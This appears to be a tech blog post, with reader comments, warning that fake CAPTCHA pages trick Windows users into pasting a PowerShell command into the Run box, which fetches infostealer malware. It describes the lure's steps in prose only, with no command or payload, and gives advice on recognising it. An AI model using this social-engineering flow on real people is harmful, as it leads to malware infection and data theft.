Captchas can be quite annoying, especially if your input is not accepted or if they do not work at all. You may now add malicious captchas to the list of annoyances.
Proton Mail published one example on X recently.
The malicious captcha tries to convince unsuspecting users to run a command on their Windows machines.
Here is how it works:
- The victim lands on a page with the fake captcha, for instance after clicking on a link in an email or chat.
- The captcha displays the usual “I’m not a robot” button.
- A click or tap on the button copies a PowerShell command to the operating system’s clipboard.
- Victim is instructed to use the shortcut Windows-R to open a run box.
- Asked to use Ctrl-V to paste the command and to press Enter to execute it.
Doing so downloads malware from a server on the Internet and runs it on the user’s system. This can be infostealers, malicious software that steals personal information, such as logins, financial documents, or photos.
While most, or even all, experienced users may never fall for that, it is almost a given that inexperienced users may. They may have difficulties getting the run box to open or paste the command, but they probably do not suspect foul play.
How to protect yourself
Protection is quite easy.
No legitimate captcha will ever ask you to execute a command on a local system, or to download a file and run it.
That is pretty much all that you need to protect yourself and your data against this type of attack.
Clearly, you may also want to ask yourself whether you trust the site you are on. Even if you conclude that you do, you should not run anything on the local computer when prompted to do so by a captcha.
Now You: how do you handle captchas on the Internet?
I boycott any Website requiring a Captcha which requires user input.
I accept Captchas of the sort ‘Verify you are human’ because it only requires a click.
Google Captchas are always blocked in conformity with my policy regarding Google.
Cloudflare Challenge Captchas are accepted given I’ve never encountered any requiring more than a user click. Bothering only when you wipe out site cookies when exiting the site as I do given most Captchas if not all set a session-only cookie which may be valid for an idiotic 10 minutes (Yep, as with Kagi Translate without an account) up to the whole session.
Regarding these new malicious Captchas, great you point this out Martin, as well as stating that “No legitimate captcha will ever ask you to execute a command on a local system, or to download a file and run it.”.
I’m the same on all points Tom, I block all Google Captchas since I’m already blocking everything from Google, and anything else that requires more than a click is not worth the bother. I also delete cookies when exiting sites. These new malicious Captchas sound weird – why would I ever run a command on my computer to look at a website? But, I guess some users are uninformed enough to do just about anything.
For the sake of truth I have to update my above comment. Update, not rectify :
“(…) most Captchas if not all set a session-only cookie which may be valid for an idiotic 10 minutes (Yep, as with Kagi Translate without an account) up to the whole session.”
Kagi Translate now sets the Cloudflare Challenge Captcha validity for the whole session. Previously it’d be only for 10 minutes and even worse : Captcha would reload as soon as the user moved to another tab (I had to include the site to a ‘Disable Page Visibility API’ userscript I use on specific sites). The change is conform to sanity ๐